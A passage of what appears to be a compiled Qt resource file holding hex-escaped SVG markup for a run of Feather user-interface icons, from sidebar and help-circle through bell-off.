\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x69\x64\x65\x62\
\x61\x72\x22\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x33\x22\x20\
\x79\x3d\x22\x33\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x38\x22\
\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x31\x38\x22\x20\x72\x78\x3d\
\x22\x32\x22\x20\x72\x79\x3d\x22\x32\x22\x3e\x3c\x2f\x72\x65\x63\
\x74\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x39\x22\x20\x79\
\x31\x3d\x22\x33\x22\x20\x78\x32\x3d\x22\x39\x22\x20\x79\x32\x3d\
\x22\x32\x31\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\
\x67\x3e\
\x00\x00\x01\x6d\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x68\x65\x6c\x70\x2d\
\x63\x69\x72\x63\x6c\x65\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\
\x63\x78\x3d\x22\x31\x32\x22\x20\x63\x79\x3d\x22\x31\x32\x22\x20\
\x72\x3d\x22\x31\x30\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\
\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x39\x2e\x30\x39\x20\x39\
\x61\x33\x20\x33\x20\x30\x20\x30\x20\x31\x20\x35\x2e\x38\x33\x20\
\x31\x63\x30\x20\x32\x2d\x33\x20\x33\x2d\x33\x20\x33\x22\x3e\x3c\
\x2f\x70\x61\x74\x68\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\
\x31\x32\x22\x20\x79\x31\x3d\x22\x31\x37\x22\x20\x78\x32\x3d\x22\
\x31\x32\x2e\x30\x31\x22\x20\x79\x32\x3d\x22\x31\x37\x22\x3e\x3c\
\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x41\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x72\x6f\x74\x61\x74\
\x65\x2d\x63\x77\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\
\x70\x6f\x69\x6e\x74\x73\x3d\x22\x32\x33\x20\x34\x20\x32\x33\x20\
\x31\x30\x20\x31\x37\x20\x31\x30\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\
\x6c\x69\x6e\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\
\x30\x2e\x34\x39\x20\x31\x35\x61\x39\x20\x39\x20\x30\x20\x31\x20\
\x31\x2d\x32\x2e\x31\x32\x2d\x39\x2e\x33\x36\x4c\x32\x33\x20\x31\
\x30\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\
\x00\x00\x01\x6d\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x75\x70\x6c\x6f\x61\
\x64\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x31\x20\
\x31\x35\x76\x34\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\
\x20\x32\x48\x35\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\
\x2d\x32\x76\x2d\x34\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\
\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\
\x31\x37\x20\x38\x20\x31\x32\x20\x33\x20\x37\x20\x38\x22\x3e\x3c\
\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\
\x78\x31\x3d\x22\x31\x32\x22\x20\x79\x31\x3d\x22\x33\x22\x20\x78\
\x32\x3d\x22\x31\x32\x22\x20\x79\x32\x3d\x22\x31\x35\x22\x3e\x3c\
\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x02\x69\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x70\x68\x6f\x6e\x65\
\x2d\x69\x6e\x63\x6f\x6d\x69\x6e\x67\x22\x3e\x3c\x70\x6f\x6c\x79\
\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x36\x20\
\x32\x20\x31\x36\x20\x38\x20\x32\x32\x20\x38\x22\x3e\x3c\x2f\x70\
\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\
\x3d\x22\x32\x33\x22\x20\x79\x31\x3d\x22\x31\x22\x20\x78\x32\x3d\
\x22\x31\x36\x22\x20\x79\x32\x3d\x22\x38\x22\x3e\x3c\x2f\x6c\x69\
\x6e\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x32\x20\
\x31\x36\x2e\x39\x32\x76\x33\x61\x32\x20\x32\x20\x30\x20\x30\x20\
\x31\x2d\x32\x2e\x31\x38\x20\x32\x20\x31\x39\x2e\x37\x39\x20\x31\
\x39\x2e\x37\x39\x20\x30\x20\x30\x20\x31\x2d\x38\x2e\x36\x33\x2d\
\x33\x2e\x30\x37\x20\x31\x39\x2e\x35\x20\x31\x39\x2e\x35\x20\x30\
\x20\x30\x20\x31\x2d\x36\x2d\x36\x20\x31\x39\x2e\x37\x39\x20\x31\
\x39\x2e\x37\x39\x20\x30\x20\x30\x20\x31\x2d\x33\x2e\x30\x37\x2d\
\x38\x2e\x36\x37\x41\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x34\
\x2e\x31\x31\x20\x32\x68\x33\x61\x32\x20\x32\x20\x30\x20\x30\x20\
\x31\x20\x32\x20\x31\x2e\x37\x32\x20\x31\x32\x2e\x38\x34\x20\x31\
\x32\x2e\x38\x34\x20\x30\x20\x30\x20\x30\x20\x2e\x37\x20\x32\x2e\
\x38\x31\x20\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x2e\x34\x35\
\x20\x32\x2e\x31\x31\x4c\x38\x2e\x30\x39\x20\x39\x2e\x39\x31\x61\
\x31\x36\x20\x31\x36\x20\x30\x20\x30\x20\x30\x20\x36\x20\x36\x6c\
\x31\x2e\x32\x37\x2d\x31\x2e\x32\x37\x61\x32\x20\x32\x20\x30\x20\
\x30\x20\x31\x20\x32\x2e\x31\x31\x2d\x2e\x34\x35\x20\x31\x32\x2e\
\x38\x34\x20\x31\x32\x2e\x38\x34\x20\x30\x20\x30\x20\x30\x20\x32\
\x2e\x38\x31\x2e\x37\x41\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\
\x32\x32\x20\x31\x36\x2e\x39\x32\x7a\x22\x3e\x3c\x2f\x70\x61\x74\
\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x48\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x68\x65\x63\x6b\
\x2d\x63\x69\x72\x63\x6c\x65\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\
\x3d\x22\x4d\x32\x32\x20\x31\x31\x2e\x30\x38\x56\x31\x32\x61\x31\
\x30\x20\x31\x30\x20\x30\x20\x31\x20\x31\x2d\x35\x2e\x39\x33\x2d\
\x39\x2e\x31\x34\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\x6f\
\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x32\
\x32\x20\x34\x20\x31\x32\x20\x31\x34\x2e\x30\x31\x20\x39\x20\x31\
\x31\x2e\x30\x31\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\
\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x94\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6d\x69\x6e\x69\x6d\
\x69\x7a\x65\x2d\x32\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\
\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x34\x20\x31\x34\x20\x31\x30\
\x20\x31\x34\x20\x31\x30\x20\x32\x30\x22\x3e\x3c\x2f\x70\x6f\x6c\
\x79\x6c\x69\x6e\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\
\x70\x6f\x69\x6e\x74\x73\x3d\x22\x32\x30\x20\x31\x30\x20\x31\x34\
\x20\x31\x30\x20\x31\x34\x20\x34\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\
\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\
\x34\x22\x20\x79\x31\x3d\x22\x31\x30\x22\x20\x78\x32\x3d\x22\x32\
\x31\x22\x20\x79\x32\x3d\x22\x33\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\
\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x33\x22\x20\x79\x31\
\x3d\x22\x32\x31\x22\x20\x78\x32\x3d\x22\x31\x30\x22\x20\x79\x32\
\x3d\x22\x31\x34\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\
\x76\x67\x3e\
\x00\x00\x01\x96\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x78\x2d\x6f\x63\x74\
\x61\x67\x6f\x6e\x22\x3e\x3c\x70\x6f\x6c\x79\x67\x6f\x6e\x20\x70\
\x6f\x69\x6e\x74\x73\x3d\x22\x37\x2e\x38\x36\x20\x32\x20\x31\x36\
\x2e\x31\x34\x20\x32\x20\x32\x32\x20\x37\x2e\x38\x36\x20\x32\x32\
\x20\x31\x36\x2e\x31\x34\x20\x31\x36\x2e\x31\x34\x20\x32\x32\x20\
\x37\x2e\x38\x36\x20\x32\x32\x20\x32\x20\x31\x36\x2e\x31\x34\x20\
\x32\x20\x37\x2e\x38\x36\x20\x37\x2e\x38\x36\x20\x32\x22\x3e\x3c\
\x2f\x70\x6f\x6c\x79\x67\x6f\x6e\x3e\x3c\x6c\x69\x6e\x65\x20\x78\
\x31\x3d\x22\x31\x35\x22\x20\x79\x31\x3d\x22\x39\x22\x20\x78\x32\
\x3d\x22\x39\x22\x20\x79\x32\x3d\x22\x31\x35\x22\x3e\x3c\x2f\x6c\
\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x39\x22\
\x20\x79\x31\x3d\x22\x39\x22\x20\x78\x32\x3d\x22\x31\x35\x22\x20\
\x79\x32\x3d\x22\x31\x35\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\
\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x38\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x6f\x72\x6e\x65\
\x72\x2d\x6c\x65\x66\x74\x2d\x75\x70\x22\x3e\x3c\x70\x6f\x6c\x79\
\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x34\x20\
\x39\x20\x39\x20\x34\x20\x34\x20\x39\x22\x3e\x3c\x2f\x70\x6f\x6c\
\x79\x6c\x69\x6e\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\
\x32\x30\x20\x32\x30\x68\x2d\x37\x61\x34\x20\x34\x20\x30\x20\x30\
\x20\x31\x2d\x34\x2d\x34\x56\x34\x22\x3e\x3c\x2f\x70\x61\x74\x68\
\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\xce\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x77\x61\x74\x63\x68\
\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\x32\
\x22\x20\x63\x79\x3d\x22\x31\x32\x22\x20\x72\x3d\x22\x37\x22\x3e\
\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\
\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x32\x20\x39\x20\
\x31\x32\x20\x31\x32\x20\x31\x33\x2e\x35\x20\x31\x33\x2e\x35\x22\
\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x70\x61\x74\
\x68\x20\x64\x3d\x22\x4d\x31\x36\x2e\x35\x31\x20\x31\x37\x2e\x33\
\x35\x6c\x2d\x2e\x33\x35\x20\x33\x2e\x38\x33\x61\x32\x20\x32\x20\
\x30\x20\x30\x20\x31\x2d\x32\x20\x31\x2e\x38\x32\x48\x39\x2e\x38\
\x33\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\x2d\x31\x2e\
\x38\x32\x6c\x2d\x2e\x33\x35\x2d\x33\x2e\x38\x33\x6d\x2e\x30\x31\
\x2d\x31\x30\x2e\x37\x6c\x2e\x33\x35\x2d\x33\x2e\x38\x33\x41\x32\
\x20\x32\x20\x30\x20\x30\x20\x31\x20\x39\x2e\x38\x33\x20\x31\x68\
\x34\x2e\x33\x35\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\
\x20\x31\x2e\x38\x32\x6c\x2e\x33\x35\x20\x33\x2e\x38\x33\x22\x3e\
\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x12\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x64\x72\x6f\x70\x6c\
\x65\x74\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x32\
\x20\x32\x2e\x36\x39\x6c\x35\x2e\x36\x36\x20\x35\x2e\x36\x36\x61\
\x38\x20\x38\x20\x30\x20\x31\x20\x31\x2d\x31\x31\x2e\x33\x31\x20\
\x30\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\
\x3e\
\x00\x00\x01\xcc\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x62\x65\x6c\x6c\x2d\
\x6f\x66\x66\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\
\x33\x2e\x37\x33\x20\x32\x31\x61\x32\x20\x32\x20\x30\x20\x30\x20\
